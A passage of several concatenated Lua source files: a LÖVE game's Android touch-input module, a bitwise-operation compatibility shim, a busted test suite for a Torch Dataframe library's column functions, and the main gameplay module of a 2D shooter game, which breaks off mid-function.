end
end
if doodle_flag == true then
move = false
if androidEsc == 1 then
doodle_flag = false
move = true
storage_puzzle = false
androidEsc = 0
elseif androidMove == -1 then
if pic_number > 1 then
pic_number = pic_number - 1
random_page()
else
pic_number = 1
end
elseif androidMove == 1 then
if pic_number < #puzzle_pics then
pic_number = pic_number + 1
random_page()
else
pic_number = #puzzle_pics
end
end
end
if clock_puzzle == true then
if androidEsc == 1 then
clock_puzzle = false
move = true
androidEsc = 0
elseif androidVertical == 1 then
if selected == "hour" then
if hour < 12 then
hour = hour + 1
else
hour = 1
end
elseif selected == "minute" then
if minute < 60 then
minute = minute + 1
else
minute = 1
end
elseif selected == "second" then
if second < 60 then
second = second + 1
else
second = 1
end
elseif selected == "ampm" then
if ampm == "am" then
ampm = "pm"
else
ampm = "am"
end
end
androidVertical = 0
elseif androidVertical == -1 then
if selected == "hour" then
if hour > 1 then
hour = hour - 1
else
hour = 12
end
elseif selected == "minute" then
if minute > 1 then
minute = minute - 1
else
minute = 60
end
elseif selected == "second" then
if second > 1 then
second = second - 1
else
second = 60
end
elseif selected == "ampm" then
if ampm == "am" then
ampm = "pm"
else
ampm = "am"
end
end
androidVertical = 0
elseif androidMove == -1 then
if selected == "minute" then
selected = "hour"
elseif selected == "second" then
selected = "minute"
elseif selected == "ampm" then
selected = "second"
end
androidMove = 0
elseif androidMove == 1 then
if selected == "hour" then
selected = "minute"
elseif selected == "minute" then
selected = "second"
elseif selected == "second" then
selected = "ampm"
end
androidMove = 0
else
if androidEnter == 1 then
clock_puzzle = false
move = true
androidEnter = 0
if hour == 10 and minute == 2 and second == 8 and ampm == "pm" then
clock_puzzle = false
sounds.item_got:play()
solved = true
sounds.main_theme:stop()
sounds.intro_soft:stop()
sounds.finding_home:stop()
sounds.ts_theme:stop()
end
end
end
end
end
function android.light()
if event_trigger_light == -1 then
_lightX = player.x + player.w/2 - images.light_small:getWidth()/2 + math.random(-0.05,0.05)
_lightY = player.y + player.h/3 - images.light_small:getHeight()/2 + math.random(-0.05,0.05)
else
_lightX = player.x + player.w/2 - images.light:getWidth()/2 + math.random(-0.05,0.05)
_lightY = player.y + player.h/3 - images.light:getHeight()/2 + math.random(-0.05,0.05)
end
lightX = _lightX
lightY = _lightY
end
function android.light_update(dt)
if light == images.light then
mainLight = images.lightOutline
elseif light == images.light2 then
mainLight = images.light2
end
local lx = player.x - images.lightOutline:getWidth()/2 + math.random(-0.05,0.05)
local ly = player.y - images.lightOutline:getHeight()/2.5 + math.random(-0.05,0.05)
if love.system.getOS() == "Android" or love.system.getOS() == "iOS" or debug == true then
love.graphics.setCanvas(custom_mask)
love.graphics.clear(0,0,0,lv)
love.graphics.setBlendMode("multiply", "premultiplied")
love.graphics.draw(mainLight,lx,ly)
love.graphics.setBlendMode("alpha")
love.graphics.setCanvas()
end
end
function android.light_draw()
if love.system.getOS() == "Android" or love.system.getOS() == "iOS" or debug == true then
love.graphics.draw(custom_mask)
end
end
function android.light_check()
local near_range = images.lightOutline:getWidth()/2.5
local inside_range = images.lightOutline:getWidth()/3
if fade.state == false then
if enemy_exists == true and lightOn == true then
if player.x >= ghost.x - inside_range and
player.x <= ghost.x + inside_range then
ghost:action_inside()
elseif player.x >= ghost.x - near_range and
player.x <= ghost.x + near_range then
ghost:action_near()
else
ghost:action_none()
end
end
end
end
function android.dialogue()
for k,v in pairs(dialogue) do
for j,k in pairs(obj) do
if v.tag == k.tag then
if v.state == true then
if androidInteract == true then
if v.n <= #v.txt then
v.n = v.n + 1
end
end
if v.option == true then
if androidMove == -1 then
v.cursor = 1
elseif androidMove == 1 then
v.cursor = 2
elseif androidInteract == true then
v:returnChoices(v.cursor)
androidInteract = false
end
androidMove = 0
end
end
end
end
end
end
function android.touchpressed(id,x,y)
local state = gamestates.getState()
if state == "main" and pauseFlag == false then
if move == true then
if guiCheck_touch(id,x,y,gLeft) then
player.android = -1
androidMove = -1
elseif guiCheck_touch(id,x,y,gRight) then
player.android = 1
androidMove = 1
end
if guiCheck_touch(id,x,y,gAct) then
androidInteract = true
end
elseif move == false then
android.dialogue()
if guiCheck_touch(id,x,y,gAct) then
androidInteract = true
end
if guiCheck_touch(id,x,y,gLeft) then
androidMove = -1
elseif guiCheck_touch(id,x,y,gRight) then
androidMove = 1
end
end
if guiCheck_touch(id,x,y,gLight) then
turnLight()
end
end
if pauseFlag == true then
if guiCheck_touch(id,x,y,gSound) then
if gSound.img == images.gui_sound then
pause.sound("off")
else
pause.sound("on")
end
end
end
end
function android.touchreleased(id,x,y)
local state = gamestates.getState()
if state == "main" and pauseFlag == false then
if move == true then
player.android = 0
androidVertical = 0
androidMove = 0
androidInteract = false
end
end
end
return android
|
local rshift, lshift, band, ok, _
local string_loader
string_loader = function(str)
local sent = false
return function()
if sent then
return nil
end
sent = true
return str
end
end
ok, band = pcall(load(string_loader([[ return function(a,b)
a = a & b
if a > 0x7FFFFFFF then
-- extend the sign bit
a = ~0xFFFFFFFF | a
end
return a
end
]])))
if ok then
_, lshift = pcall(load(string_loader([[ return function(x,y)
-- limit to 32-bit shifts
y = y % 32
x = x << y
if x > 0x7FFFFFFF then
-- extend the sign bit
x = ~0xFFFFFFFF | x
end
return x
end
]])))
_, rshift = pcall(load(string_loader([[ return function(x,y)
y = y % 32
-- truncate to 32-bit before applying shift
x = x & 0xFFFFFFFF
x = x >> y
if x > 0x7FFFFFFF then
x = ~0xFFFFFFFF | x
end
return x
end
]])))
else
do
local _obj_0 = require("bit")
rshift, lshift, band = _obj_0.rshift, _obj_0.lshift, _obj_0.band
end
end
return {
rshift = rshift,
lshift = lshift,
band = band
}
|
require 'lfs'
-- Ensure the test is launched within the specs/ folder
assert(string.match(lfs.currentdir(), "specs")~=nil, "You must run this test in specs folder")
local initial_dir = lfs.currentdir()
-- Go to specs folder
while (not string.match(lfs.currentdir(), "/specs$")) do
lfs.chdir("..")
end
local specs_dir = lfs.currentdir()
lfs.chdir("..")-- one more directory and it is lib root
-- Include Dataframe lib
dofile("init.lua")
-- Go back into initial dir
lfs.chdir(initial_dir)
describe("Column operations", function()
describe("Drop functionality",function()
it("Allows to remove an entire column", function()
local a = Dataframe(specs_dir.."/data/simple_short.csv")
a:drop('Col A')
assert.is_true(not a:has_column('Col A'))
assert.is_true(a:has_column('Col B'))
assert.is_true(a:has_column('Col C'))
assert.are.same(a:shape(), {rows=4, cols=2})-- "The simple_short.csv is 4x3 after drop should be 4x2"
-- Should cause an error
assert.has_error(function() a:drop('Col A') end)
end)
it("Allows to remove multiple columns", function()
local a = Dataframe(specs_dir.."/data/simple_short.csv")
a:drop('Col A')
assert.is_true(not a:has_column('Col A'))
assert.is_true(a:has_column('Col B'))
assert.is_true(a:has_column('Col C'))
assert.are.same(a:shape(), {rows=4, cols=2})-- "The simple_short.csv is 4x3 after drop should be 4x2"
-- Should cause an error
assert.has_error(function() a:drop('Col A') end)
-- Drop second column
a:drop('Col B')
assert.is_true(not a:has_column('Col A'))
assert.is_true(not a:has_column('Col B'))
assert.is_true(a:has_column('Col C'))
assert.are.same(a:shape(), {rows=4, cols=1})-- "The simple_short.csv is 4x3 after drop should be 4x1"
end)
it("Resets the Dataframe when all columns are dropped",function()
local a = Dataframe(specs_dir.."/data/simple_short.csv")
a:drop('Col A')
a:drop('Col B')
-- All are dropped
a:drop('Col C')
assert.are.same(a.dataset, {})-- "All columns are dropped"
assert.are.same(a.column_order,{})
assert.are.same(a.tostring_defaults,
{no_rows = 10,
min_col_width = 7,
max_table_width = 80})
assert.is.equal(a:size(1),0)
end)
end)
describe("Add functionality",function()
local a = Dataframe(specs_dir.."/data/simple_short.csv")
it("Raises an error if the column is already existing",function()
assert.has_error(function() a:add_column('Col A') end)
end)
it("Allows to use a table as the default value",function()
d_col = {0,1,2,3}
a:add_column('Col D', Dataseries(Df_Array(d_col)))
assert.are.same(a:get_column('Col D'), d_col)-- "Col D isn't the expected value"
assert.are.same(a:shape(), {rows=4, cols=4})-- "The simple_short.csv is 4x3 after add should be 4x4"
end)
it("Fills all the column with NaN values if no default value to insert is provided",function()
a:add_column('Col E')
col = a:get_column('Col E')
for i=1,#col do
assert.is.nan(col[i])
end
end)
it("Fills all the column with default value if it is a single value",function()
a:add_column('Col F', 1)
assert.are.same(a:get_column('Col F'), {1,1,1,1})
end)
it("Fails if the default value provided is a table with a different number of rows",function()
assert.has.error(function() a:add_column('Col G', {0,1,2,3,5}) end)
end)
it("Add positioning",function()
a:add_column('Position 1', 1, 1)
assert.are.same(a:get_column_order('Position 1'), 1)
a:add_column{
column_name = 'Position 3',
pos = 3,
default_value = 'A' -- Can't do ordered call since 'A' becomes type
}
assert.are.same(a:get_column_order('Position 3'), 3)
end)
end)
describe("Get a column functionality",function()
local a = Dataframe(specs_dir.."/data/full.csv")
assert.are.same(a:get_column('Col A'), {1,2,3,4})
it("Fails if the column doesn't exist",function()
assert.has.error(function() a:get_column('Col H') end)
end)
it("Returns a numerical column as a tensor",function()
a_tnsr = torch.Tensor({1,2,3,4})
a_col = a:get_column{column_name="Col A", as_tensor=true}
a_col = a_col:type(a_tnsr:type())
assert.is_true(torch.all(a_tnsr:eq(a_col)))
end)
it("Fails returning a tensor if the column is not numerical",function()
assert.has_error(function() a:get_column{column_name="Col D",as_tensor=true} end)
end)
end)
describe("Reset column functionality",function()
local a = Dataframe(specs_dir.."/data/simple_short.csv")
it("Resets single column's values",function()
a:reset_column('Col C', 555)
assert.are.same(a:get_column('Col C'), {555, 555, 555, 555})
end)
it("Resets multiple columns at once",function()
a:reset_column(Df_Array('Col A', 'Col B'), 444)
assert.are.same(a:get_column('Col A'), {444, 444, 444, 444})
assert.are.same(a:get_column('Col B'), {444, 444, 444, 444})
end)
end)
describe("Rename column functionality",function()
local a = Dataframe(specs_dir.."/data/simple_short.csv")
a:rename_column("Col C","Col V")
assert.is_true(a:has_column("Col V"))
assert.is_true(not a:has_column("Col C"))
it("Fails if the column doesn't exist",function()
assert.has_error(function() a:rename_column('Col M','Col G') end)
end)
it("Fails if the new column already exist",function()
assert.has_error(function() a:rename_column('Col A','Col B') end)
end)
it("Refreshs metadata",function()
local colfound = false
for k,v in pairs(a.column_order) do
if v == 'Col V' then
colfound = true
end
end
assert.is_true(colfound)
assert.are.same({'Col A','Col B','Col V'},a.column_order)
end)
end)
describe("Search functionalities",function()
local a = Dataframe(specs_dir.."/data/advanced_short.csv")
it("Finds the value in Col B", function()
assert.are.same(a:which('Col B', 'A'), {1})
assert.are.same(a:which('Col B', 'B'), {2,3})
end)
it("Finds the value in Col A", function()
assert.are.same(a:which('Col A', 'A'), {})
assert.are.same(a:which('Col A', 1), {1})
end)
it("Finds the value in Col C", function()
assert.are.same(a:which('Col C', 0/0), {2})
assert.are.same(a:which('Col C', 9), {3})
end)
it("Finds the max value", function()
local indx, val = a:which_max('Col A')
assert.are.same(indx, {3})
assert.are.same(val, 3)
indx, val = a:which_max('Col C')
assert.are.same(indx, {3})
assert.are.same(val, 9)
assert.has_error(function() a:which_max('Col B') end)
end)
it("Finds the min value", function()
local indx, val = a:which_min('Col A')
assert.are.same(indx, {1})
assert.are.same(val, 1)
indx, val = a:which_min('Col C')
assert.are.same(indx, {1})
assert.are.same(val, 8)
assert.has_error(function() a:which_min('Col B') end)
end)
end)
describe("Other functionalities",function()
local a = Dataframe(specs_dir.."/data/advanced_short.csv")
it("Returns all numerical columns names", function()
assert.are.same(a:get_numerical_colnames(), {'Col A', 'Col C'})
end)
it("Checks if a column exist",function()
assert.is_false(a:has_column("Col H"))
assert.is_true(a:has_column("Col A"))
end)
it("Checks if a column is numerical",function()
assert.has.error(function() a:is_numerical("Col H") end)
assert.is_true(a:is_numerical("Col A"))
assert.is_false(a:is_numerical("Col B"))
end)
end)
describe("Bind columns",function()
it("Equal correct cbind and dataframe", function()
local a = Dataframe(specs_dir.."/data/advanced_short.csv")
local b = Dataframe()
b:load_table(Df_Dict({Test = {1,2,3}}))
a:cbind(b)
assert.are.same(a:get_column('Test'),
b:get_column('Test'))
end)
it("Equal correct cbind with Df_Dict", function()
local a = Dataframe(specs_dir.."/data/advanced_short.csv")
a:cbind(Df_Dict({Test = {1,2,3}}))
assert.are.same(a:get_column('Test'),
{1,2,3})
end)
it("Checks input", function()
local a = Dataframe(specs_dir.."/data/advanced_short.csv")
local b = Dataframe()
b:load_table(Df_Dict({Test = {1,2,3,4}}))
assert.has_error(function() a:cbind(b) end)
local c = Dataframe()
c:load_table(Df_Dict({['Col A'] = {1,2,3}}))
assert.has_error(function() a:cbind(c) end)
end)
end)
describe("Boolean columns", function()
before_each(function()
a = Dataframe(Df_Dict{
nmbr = {1, 2, 3, 4},
str = {"a", "b", "c", "d"},
bool = {true, false, true, 0/0}
})
end)
it("Check that column type is boolean", function()
assert.is_true(a:is_boolean("bool"))
assert.is_false(a:is_boolean("nmbr"))
assert.is_false(a:is_boolean("str"))
end)
it("Verify that boolean2tensor conversion works", function()
a:boolean2tensor{
column_name = "bool",
false_value = 1,
true_value = 2
}
assert.is_false(a:is_boolean("bool"))
assert.is_true(a:is_numerical("bool"))
assert.are.same(a:get_column("bool"), {2,1,2,0/0})
end)
it("Verify that boolean2tensor conversion works", function()
a:boolean2categorical("bool")
assert.is_false(a:is_boolean("bool"))
assert.is_true(a:is_numerical("bool"))
assert.are.same(a:get_column("bool"),
{"true","false","true",0/0})
end)
it("Verify that boolean2tensor with custom strins work", function()
a:boolean2categorical("bool", "no", "yes")
assert.is_false(a:is_boolean("bool"))
assert.is_true(a:is_numerical("bool"))
assert.are.same(a:get_column("bool"),
{"yes", "no", "yes",0/0})
a:fill_all_na()
assert.are.same(a:get_column("bool"),
{"yes", "no", "yes","__nan__"})
end)
end)
end)
|
-- This is the central module of the game.
-- All of the large-scale logic is here, along with miscellaneous small tasks.
-- utilities module
util = require "util"
-- spawn module
spawn = require "spawn"
-- collision module
shc = require "shc"
-- input and I/O device module
inbox = require "inbox"
-- set up broad-ranging game data
game_status = {
menu = nil,
threshhold = 144,
score = 0,
high_score = 0,
window_position = {
x = nil,
y = nil,
display = nil
}
}
-- set up player data
player = {
x = 0,
y = 0,
width = 0,
height = 0,
form = "small",
small_height = 0,
medium_height = 0,
large_height = 0,
health = 3,
max_health = 3,
hurt = false,
flinch_timer = 0,
spawn_timer = 0,
flicker_timer = 0,
flicker_max = 0.070,
horizontal_speed = nil,
vertical_speed = nil,
low_speed = 120,
medium_speed = 150,
high_speed = 180,
alive = false,
lives = 3,
appearance = {
small_sprite = nil,
medium_sprite = nil,
large_sprite = nil
},
small_projectile_speed = 240,
large_projectile_speed = 200,
small_projectile_sprite = nil,
large_projectile_sprite = nil,
projectile_timer = 0,
small_projectiles = {},
large_projectiles = {}
}
-- set up data for game controls
controls = {
kbd = {
bindings = {
pause = "escape",
main_attack = "c",
form_up = "x",
form_down = "z",
up = "up",
down = "down",
left = "left",
right = "right",
debug = "`"
},
modifier = {
pause = true,
main_attack = false,
form_up = false,
form_down = false,
up = true,
down = true,
left = true,
right = true,
debug = false
}
},
cnt = {
pause = "start",
main_attack = "a",
form_up = "x",
form_down = "b",
up = "dpup",
down = "dpdown",
left = "dpleft",
right = "dpright",
analog_sticks = {
movement_stick = "left",
inversion = "disabled",
slow_horizontal_threshhold = 0.1,
slow_vertical_threshhold = 0.1,
medium_horizontal_threshhold = 0.35,
medium_vertical_threshhold = 0.35,
fast_horizontal_threshhold = 0.65,
fast_vertical_threshhold = 0.65,
positions = {
left_horizontal = 0,
left_vertical = 0,
right_horizontal = 0,
right_vertical = 0,
}
}
},
quick_detect = {
pause = 0,
main_attack = 0,
up = 0,
down = 0,
left = 0,
right = 0,
debug = 0
},
controller = nil
}
--[[
glossary of named states and important variables and data points for controls:
kbd: table -- holds keyboard controls
cnt: table -- holds controller (gamepad) controls
touch: table -- holds touchscreen controls and data
pause ... accept: string, format determined by LOVE -- gameplay and menu controls
analog_sticks: table -- holds data relating to analog sticks
movement_stick: left | right | disabled -- which analog stick is used to move and access menus
inversion: horizontal | vertical | both | disabled -- which analog stick directions are reversed
horizontal_threshhold: 0.1 ... 1.0 -- threshhold for horizontal analog stick movement to cause action
vertical_threshhold: 0.1 ... 1.0 -- threshhold for vertical analog stick movement to cause action
positions: table -- holds the intensity of horizontal and vertical displacement of each analog stick
left_horizontal ... right_vertical: -1.0 ... 1.0 -- degree of inclination in a dimension per stick
controller: table -- holds various data and functions relating to the active controller
]]--
map = {
stars = {
near_stars = {
image = nil,
quad = nil,
speed = 3.4,
spawn_group = spawn.star_group,
spawn_stars = spawn.stars,
groups = {}
},
far_stars = {
image = nil,
quad = nil,
speed = 2,
spawn_group = spawn.star_group,
spawn_stars = spawn.stars,
groups = {}
}
},
explosions = {}
}
enemies = {
spawn_timer = 5,
spawn_latch = 2.70,
attack_timer = 6.5,
attack_latch = 1.35,
weight_point = love.graphics.getHeight() / 2,
weight_wait = 12,
basic = {
sprite = nil,
locations = {},
projectiles = {
sprite = nil,
speed = 180,
width = 25,
height = 25,
locations = {}
}
}
}
function love.focus(focused_on_game)
-- this function is called when the OS's focus is put on the game and when focus is taken away;
-- this includes minimizing and un-minimizing the game
if not focused_on_game and game_status.menu == "none" then
-- pause the game if the player switches away from it and it's not already paused
if game_status.menu == "none" or game_status.menu == "pause" then
game_status.menu = "pause"
end
game_status.selected_item = 1
end
end
function love.mousemoved(x, y, dx, dy)
if player.alive and game_status.menu == "none" then
-- move the player with the mouse as long as they're alive and the game isn't paused
player.x = player.x + (dx * 2/3)
player.y = player.y + (dy * 2/3)
end
end
function love.mousepressed(x, y, button)
if game_status.menu == "game_over" then
game_status.menu = "pause"
end
end
function love.wheelmoved(x, y)
-- handle moving the mouse's scroll wheel
if player.alive and not player.hurt then
if y > 0 then
if player.form == "small" then
player.form = "medium"
player.height = player.medium_height
player.y = player.y - ((player.medium_height - player.small_height) / 2)
elseif player.form == "medium" then
player.form = "large"
player.height = player.large_height
player.y = player.y - ((player.large_height - player.medium_height) / 2)
end
elseif y < 0 then
if player.form == "large" then
player.form = "medium"
player.height = player.medium_height
player.y = player.y + ((player.large_height - player.medium_height) / 2)
elseif player.form == "medium" then
player.form = "small"
player.height = player.small_height
player.y = player.y + ((player.medium_height - player.small_height) / 2)
end
end
end
end
function love.quit()
-- deal with the player trying to quit the game
if game_status.menu ~= "quit_confirmed" then
-- don't quit
game_status.input_type = nil
game_status.selected_item = 1
game_status.menu = "quit_check"
return true
elseif game_status.menu == "quit_confirmed" then
-- completely quit the game
return false
end
end
function love.load(arg)
-- this function is called when the game starts
-- prepare game data and spawn game objects
spawn.prepare_constant_data()
-- reseed the random number generator
love.math.setRandomSeed((math.floor(tonumber(os.date("%d")) / 10) + 1) * (tonumber(os.date("%w")) + 1) * tonumber(os.date("%I")) * (tonumber(os.date("%M")) + 1) * (math.floor(tonumber(os.date("%S")) / 12) + 1))
player.width = player.appearance.small_sprite:getWidth()
player.height = player.appearance.small_sprite:getHeight()
love.graphics.setBackgroundColor(236, 240, 236)
love.mouse.setRelativeMode(true)
spawn.player(0, 235)
player.form = "small"
player.height = player.small_height
game_status.menu = "pause"
end -- love.load
function love.update(dt)
-- this function is called once per frame, contains game logic, and provides a delta-time variable
-- check if the game window is being moved
local temp_window_position = {x = nil, y = nil, display = nil}
temp_window_position.x, temp_window_position.y, temp_window_position.display = love.window.getPosition()
if game_status.window_position.x ~= temp_window_position.x or game_status.window_position.y ~= temp_window_position.y or game_status.window_position.display ~= temp_window_position.display then
-- the game window is being moved, pause the game for player safety and game state integrity
if game_status.menu == "none" then
game_status.menu = "pause"
end
game_status.input_type = nil
game_status.window_position.x, game_status.window_position.y, game_status.window_position.display = love.window.getPosition()
end
-- get the controls being pressed right now
inbox.instant_press()
local quick_detect = controls.quick_detect
if quick_detect.up or quick_detect.down then
player.vertical_speed = player.medium_speed
end
if quick_detect.left or quick_detect.right then
player.horizontal_speed = player.medium_speed
end
-- poll the active controller's analog sticks and set various data relating to movement
local sticks = controls.cnt.analog_sticks
if controls.controller then
inbox.stick_poll(dt)
-- fudge the controls a bit
if sticks.positions.left_vertical > sticks.slow_vertical_threshhold then
controls.quick_detect.down = -1
elseif sticks.positions.left_vertical < -sticks.slow_vertical_threshhold then
controls.quick_detect.up = -1
end
if sticks.positions.left_horizontal > sticks.slow_horizontal_threshhold then
controls.quick_detect.right = -1
elseif sticks.positions.left_horizontal < -sticks.slow_horizontal_threshhold then
controls.quick_detect.left = -1
end
-- set movement speeds in different directions
if math.abs(sticks.positions.left_vertical) >= sticks.slow_vertical_threshhold then
player.vertical_speed = player.low_speed
if math.abs(sticks.positions.left_vertical) >= sticks.medium_vertical_threshhold then
player.vertical_speed = player.medium_speed
if math.abs(sticks.positions.left_vertical) >= sticks.fast_vertical_threshhold then
player.vertical_speed = player.high_speed
end
end
end
if math.abs(sticks.positions.left_horizontal) >= sticks.slow_horizontal_threshhold then
player.horizontal_speed = player.low_speed
if math.abs(sticks.positions.left_horizontal) >= sticks.medium_horizontal_threshhold then
player.horizontal_speed = player.medium_speed
if math.abs(sticks.positions.left_horizontal) >= sticks.fast_horizontal_threshhold then
player.horizontal_speed = player.high_speed
end
end
end
end
-- deal with mouse clicks
if love.mouse.isDown(1) then
quick_detect.main_attack = -1
end
if game_status.menu == "none" then
-- run the main game logic
-- keep track of points
local added_points = 0
for enemy_index, selected_enemy in pairs(enemies.basic.locations) do
-- loop over enemies
-- move enemies
if selected_enemy.horizontal_direction == "left" then
selected_enemy.x = selected_enemy.x - selected_enemy.speed * dt
elseif selected_enemy.horizontal_direction == "right" then
selected_enemy.x = selected_enemy.x + selected_enemy.speed * dt
end
if selected_enemy.vertical_direction == "up" then
selected_enemy.y = selected_enemy.y - selected_enemy.speed * dt
elseif selected_enemy.vertical_direction == "down" then
selected_enemy.y = selected_enemy.y + selected_enemy.speed * dt
end
-- check for collisions with the player
if not player.hurt then
if shc.check_collision(player.x, player.y, player.width, player.height, selected_enemy.x, selected_enemy.y, selected_enemy.width, selected_enemy.height, "full") then
-- damage the player
player.health = player.health - 1
player.flinch_timer = 1
player.hurt = true
end
end
-- check for enemies leaving the screen
if selected_enemy.x + selected_enemy.width < 0 or selected_enemy.x > love.graphics.getWidth() or selected_enemy.y + selected_enemy.height < 0 or selected_enemy.y > love.graphics.getHeight() then
-- the enemy is off the screen, despawn it
enemies.basic.locations[enemy_index] = enemies.basic.locations[#enemies.basic.locations]
enemies.basic.locations[#enemies.basic.locations] = nil
end
-- check for player projectiles hitting an enemy
for projectile_index, selected_projectile in pairs(player.small_projectiles) do
if shc.check_collision(selected_projectile.x, selected_projectile.y, player.small_projectile_sprite:getWidth(), player.small_projectile_sprite:getHeight(), selected_enemy.x, selected_enemy.y, selected_enemy.width, selected_enemy.height, "full") then
-- despawn the enemy
enemies.basic.locations[enemy_index] = enemies.basic.locations[#enemies.basic.locations]
enemies.basic.locations[#enemies.basic.locations] = nil
if player.form ~= "large" then
player.projectile_timer = 0.001
end
-- make an explosion
spawn.explosion(selected_projectile.x + player.small_projectile_sprite:getWidth(), selected_projectile.y + (player.small_projectile_sprite:getHeight() / 2), 7, 14)
-- add points
added_points = added_points + 20
if selected_enemy.vertical_direction ~= "none" then
added_points = added_points + 10
end
if selected_enemy.horizontal_direction == "right" then
added_points = added_points + 10
end
-- get rid of the projectile
table.remove(player.small_projectiles, projectile_index)
end
end
for projectile_index, selected_projectile in pairs(player.large_projectiles) do
if shc.check_collision(selected_projectile.x, selected_projectile.y, player.large_projectile_sprite:getWidth(), player.large_projectile_sprite:getHeight(), selected_enemy.x, selected_enemy.y, selected_enemy.width, selected_enemy.height, "full") then
-- despawn the enemy
enemies.basic.locations[enemy_index] = enemies.basic.locations[#enemies.basic.locations]
enemies.basic.locations[#enemies.basic.locations] = nil
spawn.explosion(selected_projectile.x + player.large_projectile_sprite:getWidth(), selected_projectile.y + (player.large_projectile_sprite:getHeight() / 2), 7, 14)
-- add points
added_points = added_points + 20
if selected_enemy.vertical_direction ~= "none" then
added_points = added_points + 10
end
if selected_enemy.horizontal_direction == "right" then
added_points = added_points + 10
end
end
end
end
for projectile_index, selected_projectile in pairs(enemies.basic.projectiles.locations) do
-- loop over enemy projectiles
-- move projectiles
selected_projectile.x = selected_projectile.x - enemies.basic.projectiles.speed * dt
-- check for player collisions
if not player.hurt then
if shc.check_collision(selected_projectile.x, selected_projectile.y, enemies.basic.projectiles.width, enemies.basic.projectiles.height, player.x, player.y, player.width, player.height, "left") then
-- damage the player
player.health = player.health - 1
player.flinch_timer = 1
player.hurt = true
end
end
-- check for player projectiles hitting an enemy projectile
for player_projectile_index, selected_player_projectile in pairs(player.small_projectiles) do
if shc.check_collision(selected_projectile.x, selected_projectile.y, enemies.basic.projectiles.width, enemies.basic.projectiles.height, selected_player_projectile.x, selected_player_projectile.y, player.small_projectile_sprite:getWidth(), player.small_projectile_sprite:getHeight(), "full") then
-- the player hit an enemy projectile with their own, remove both
if player.form ~= "large" then
player.projectile_timer = 0.001
end
spawn.explosion(selected_player_projectile.x + player.small_projectile_sprite:getWidth(), selected_player_projectile.y + (player.small_projectile_sprite:getHeight() / 2), 4, 9)
added_points = added_points + 10
table.remove(enemies.basic.projectiles.locations, projectile_index)
table.remove(player.small_projectiles, projectile_index)
end
end
for player_projectile_index, selected_player_projectile in pairs(player.large_projectiles) do
if shc.check_collision(selected_projectile.x, selected_projectile.y, enemies.basic.projectiles.width, enemies.basic.projectiles.height, selected_player_projectile.x, selected_player_projectile.y, player.large_projectile_sprite:getWidth(), player.large_projectile_sprite:getHeight(), "full") then
-- the player hit an enemy projectile with their own
spawn.explosion(selected_player_projectile.x + player.large_projectile_sprite:getWidth(), selected_player_projectile.y + (player.large_projectile_sprite:getHeight() / 2), 4, 9)
added_points = added_points + 10
table.remove(enemies.basic.projectiles.locations, projectile_index)
end
end
if selected_projectile.x + enemies.basic.projectiles.width < 0 then
-- remove projectiles that go off the screen
table.remove(enemies.basic.projectiles.locations, projectile_index)
end
end
-- manage player projectiles
for projectile_index, selected_projectile in pairs(player.small_projectiles) do
if selected_projectile.x >= love.graphics.getWidth() then
table.remove(player.small_projectiles, projectile_index)
elseif selected_projectile.x > 0 and selected_projectile.x < love.graphics.getWidth() then
selected_projectile.x = selected_projectile.x + (player.small_projectile_speed * dt)
end
end
for projectile_index, selected_projectile in pairs(player.large_projectiles) do
if selected_projectile.x >= love.graphics.getWidth() then
table.remove(player.large_projectiles, projectile_index)
elseif selected_projectile.x > 0 and selected_projectile.x < love.graphics.getWidth() then
selected_projectile.x = selected_projectile.x + (player.large_projectile_speed * dt)
end
end
-- manage scoring
game_status.score = game_status.score + added_points
if game_status.score > game_status.high_score then
game_status.high_score = game_status.score
end
-- manage explosions
for explosion_index, selected_explosion in pairs(map.explosions) do
if selected_explosion.switch == "explode" then
selected_explosion.size = selected_explosion.size + (dt * selected_explosion.speed)
selected_explosion.first_ring_size = selected_explosion.size + 2
selected_explosion.second_ring_size = selected_explosion.first_ring_size + 3
if selected_explosion.size > selected_explosion.MAX_EXPLOSION then
selected_explosion.switch = "implode"
end
elseif selected_explosion.switch == "implode" then
selected_explosion.size = selected_explosion.size - (dt * selected_explosion.speed)
selected_explosion.first_ring_size = selected_explosion.first_ring_size + (dt * selected_explosion.speed * 0.7)
selected_explosion.second_ring_size = selected_explosion.second_ring_size + (dt * selected_explosion.speed * 0.5)
if selected_explosion.size <= 2 then
table.remove(map.explosions, explosion_index)
end
end
end
if player.alive then
-- move the player
if quick_detect.up < quick_detect.down then
player.y = player.y - (player.vertical_speed * dt)
elseif quick_detect.down < quick_detect.up then
player.y = player.y + (player.vertical_speed * dt)
end
if quick_detect.left < quick_detect.right then
player.x = player.x - (player.horizontal_speed * dt)
elseif quick_detect.right < quick_detect.left then
player.x = player.x + (player.horizontal_speed * dt)
end
-- keep the player on the screen
if player.x < 0 then
player.x = 0
elseif player.x + player.width > game_status.threshhold then
player.x = game_status.threshhold - player.width
end
if player.y < 0 then
player.y = 0
elseif player.y + player.height > love.graphics.getHeight() then
player.y = love.graphics.getHeight() - player.height
end
-- manage player hurt state
if player.hurt then
if player.flinch_timer > 0 then
player.flinch_timer = player.flinch_timer - dt
elseif player.flinch_timer <= 0 then
player.flinch_timer = 0
player.hurt = false
end
end
-- manage player projectile spawning
if player.projectile_timer > 0 then
player.projectile_timer = player.projectile_timer - dt
elseif player.projectile_timer <= 0 then
player.projectile_timer = 0
end
if quick_detect.main_attack < 0 then
if player.form == "small" or player.form == "medium" then
spawn.player_projectile(player.x + player.width, player.y + (player.height / 2) - (player.small_projectile_sprite:getHeight() / 2))
elseif player.form == "large" then
spawn.player_projectile(player.x + player.width, player.y + (player.height / 2) - (player.large_projectile_sprite:getHeight() / 2))
end
end
-- manage player health and death
if player.health <= 0 then
player.spawn_timer = 3
player.alive = false
end
elseif not player.alive then
-- the player is dead
if player.lives > 0 then
player.spawn_timer = player.spawn_timer - dt
if player.spawn_timer <= 0 then
player.spawn_timer = 0
player.flinch_timer = 0
player.lives = player.lives - 1
spawn.player(0, 235)
end
elseif player.lives <= 0 then
-- game over
game_status.menu = "game_over"
enemies.basic.locations = {}
enemies.basic.projectiles.locations = {}
enemies.spawn_timer = 7
enemies.spawn_latch = 2.70
enemies.attack_timer = 8.5
enemies.attack_latch = 1.35
enemies.weight_wait = 12
map.explosions = {}
game_status.score = 0
player.small_projectiles = {}
player.large_projectiles = {}
player.lives = 3
spawn.player(0, love.graphics.getHeight() / 2)
end
end
if enemies.spawn_timer > 0 then
enemies.spawn_timer = enemies.spawn_timer - dt
enemies.weight_wait = enemies.weight_wait - dt
elseif enemies.spawn_timer <= 0 then
-- spawn a new enemy
local rand_x = util.weighted_random(750, 950, 880)
